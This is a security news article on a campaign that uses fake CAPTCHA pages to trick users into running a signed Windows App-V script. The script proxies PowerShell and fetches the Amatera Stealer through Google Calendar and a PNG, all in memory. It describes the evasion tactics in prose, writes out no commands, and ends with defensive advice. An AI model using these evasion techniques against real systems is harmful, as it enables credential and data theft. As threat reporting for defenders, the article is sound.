Windows App-V Scripts Bypass Enterprise Defenses with Infostealer

A sophisticated malware campaign is leveraging trusted Windows components to bypass enterprise security measures and deploy a potent information-stealing payload. Security researchers have uncovered a delivery method that cleverly avoids detection by using legitimate Microsoft scripts and user interaction gates. This approach specifically targets high-value corporate systems, making it a significant threat to organizational data security.

The attack begins with a social engineering ploy. Users encounter fake CAPTCHA verification pages designed to trick them into copying and pasting a specific command into the Windows Run dialog. This manual action is a critical part of the infection chain. Instead of directly invoking PowerShell, the supplied command abuses a signed Microsoft script called `SyncAppvPublishingServer.vbs`. This script is normally associated with Application Virtualization (App-V) for managing virtualized enterprise applications. In this campaign, it acts as a trusted conduit to proxy PowerShell execution, effectively hiding malicious activity behind a legitimate Windows component.

The technique relies on a specific environment to succeed. The infection chain utilizes `wscript.exe` and the App-V publishing script, but it only functions on systems where App-V is present and enabled. This typically includes machines running modern Windows Server and Windows 10/11 Enterprise or Education editions, precisely the higher-value systems found in corporate environments. The process will fail on personal computers using Home or Pro installations. Furthermore, the malware includes a check to ensure the command is executed manually by a user; if it detects automated execution in a security sandbox, the infection halts.

Once on a compatible and correctly triggered system, the attack proceeds with a multi-stage, fileless process. An in-memory loader script first pulls data from a public Google Calendar `.ics` file to retrieve instructions for subsequent stages. Next, it fetches a PNG image file that contains an encrypted and compressed PowerShell payload. This payload is also processed entirely in memory, setting the stage for the final act: the retrieval and in-memory execution of the Windows PE payload identified as the Amatera Stealer.

The true danger of this campaign lies not in the final payload, but in its meticulous evasion tactics. By chaining together signed Microsoft components, gating execution based on user behavior, utilizing third-party services like Google Calendar, and maintaining fully in-memory stages, the attackers prioritize stealth and reliability. This methodology allows the malware to slip past environments tuned to detect obvious threats, often succeeding without triggering alarms until after data has been exfiltrated.

To defend against such advanced techniques, a layered security strategy is essential. Beyond user education to recognize fraudulent CAPTCHA pages and potentially restricting access to the Run dialog, organizations should implement robust monitoring. Enabling comprehensive PowerShell logging is crucial for spotting suspicious execution patterns. Additionally, security teams should evaluate the necessity of App-V components on endpoints; removing them where they are not required or configuring alerts for PowerShell execution originating from App-V scripts can help close this specific attack vector. Proactive monitoring for unusual network connections to services like public Google Calendar events can also provide early warning signs of compromise.

(Source: HelpNet Security)